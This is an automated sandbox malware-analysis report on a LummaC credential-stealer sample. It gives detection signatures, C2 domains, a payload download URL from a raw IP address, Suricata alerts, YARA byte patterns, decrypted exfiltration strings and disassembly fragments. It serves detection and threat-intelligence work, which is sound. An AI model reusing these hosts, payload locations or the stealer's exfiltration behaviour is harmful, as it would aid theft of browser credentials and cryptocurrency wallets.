Edit tour

Windows Analysis Report
TUp6f2knn2.exe

Overview

General Information

Sample name:	TUp6f2knn2.exe renamed because original name is a hash value
Original sample name:	a4f21b597fb56b09132987c396b7acc2.exe
Analysis ID:	1577889
MD5:	a4f21b597fb56b09132987c396b7acc2
SHA1:	5ac95809ec82f0cdb3612ad1c1bbdd85196273b8
SHA256:	309bb2b85b8789299d9cc64934970b6010956a208de3ed9b853578ae8a15810b
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TUp6f2knn2.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\TUp6f2knn2.exe" MD5: A4F21B597FB56B09132987C396B7ACC2)

B4A1.tmp.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe" MD5: 9026F04B1266851659FB62C91BD7F2F3)

WerFault.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1800 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["discokeyus.lat", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "grannyejh.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1000:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1400:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B4A1.tmp.exe PID: 7460	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: B4A1.tmp.exe PID: 7460	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B4A1.tmp.exe PID: 7460	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:56.725004+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:58.668650+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:10:01.401906+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.24.223	443	TCP
2024-12-18T21:10:03.816941+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.24.223	443	TCP
2024-12-18T21:10:06.504622+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.24.223	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:57.439274+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:59.595961+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.24.223	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:57.439274+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.24.223	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:59.595961+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49733	104.21.24.223	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:56.725004+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.24.223	443	TCP
2024-12-18T21:09:58.668650+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.24.223	443	TCP
2024-12-18T21:10:01.401906+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.24.223	443	TCP
2024-12-18T21:10:03.816941+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.24.223	443	TCP
2024-12-18T21:10:06.504622+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.24.223	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:55.352230+0100	2058374	1	Domain Observed Used for C2 Detected	192.168.2.4	50223	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:10:02.320402+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.24.223	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T21:09:50.794243+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-18T21:09:52.352523+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://rapeflowwj.lat/L	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/IN	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe.	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/i	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEQb	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/apikXuSc	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/api	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/mN	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/apireW08D	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/(	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312567

Found malware configuration

Source: 1.2.B4A1.tmp.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["discokeyus.lat", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "grannyejh.lat", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: TUp6f2knn2.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TUp6f2knn2.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000003.1770836716.0000000002500000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Code function: 1_2_00415799 CryptUnprotectData,

1_2_00415799

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Unpacked PE file: 0.2.TUp6f2knn2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Unpacked PE file: 1.2.B4A1.tmp.exe.400000.0.unpack

Source: TUp6f2knn2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.24.223:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, esi	1_2_00422190
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_00422190
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00422190
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_004096C1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	1_2_004096C1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	1_2_0043C767
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_00415799
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00415799
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp eax	1_2_0042984F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	1_2_00423860
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_00438810
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	1_2_00438810
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	1_2_00438810
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then test eax, eax	1_2_00438810
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	1_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	1_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	1_2_0041D83A
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push C0BFD6CCh	1_2_00423086
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push C0BFD6CCh	1_2_00423086
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	1_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	1_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_00405990
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebp, eax	1_2_00405990
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	1_2_00416263
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	1_2_00415220
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push esi	1_2_00427AD3
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	1_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push ebx	1_2_0043CA93
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00428B61
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, eax	1_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	1_2_00417380
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	1_2_0041D380
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00426B95
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00435450
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	1_2_00417380
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push 00000000h	1_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	1_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	1_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp eax	1_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	1_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00409580
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	1_2_00409580
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	1_2_00418591
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	1_2_00428D93
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then xor edi, edi	1_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	1_2_0041C653
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov edx, ebp	1_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	1_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	1_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	1_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042A700
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	1_2_0040B70C
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0041BF14
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	1_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	1_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	1_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	1_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, ebx	1_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0040BFFD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov ecx, ebx	1_2_024DE250
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp ecx	1_2_024BC264
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_024E8A77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	1_2_024E8A77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	1_2_024E8A77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then test eax, eax	1_2_024E8A77
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	1_2_024EF217
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	1_2_024C9A29
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	1_2_024C9A29
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_024C9A29
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	1_2_024CEA27
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_024CD230
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_024CD230
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]	1_2_024C4ACD
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then push C0BFD6CCh	1_2_024D32ED
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	1_2_024CDAB8
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then jmp eax	1_2_024D9AB5
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_024C6B2A
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_024DB3D7
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]	1_2_024C4BD2
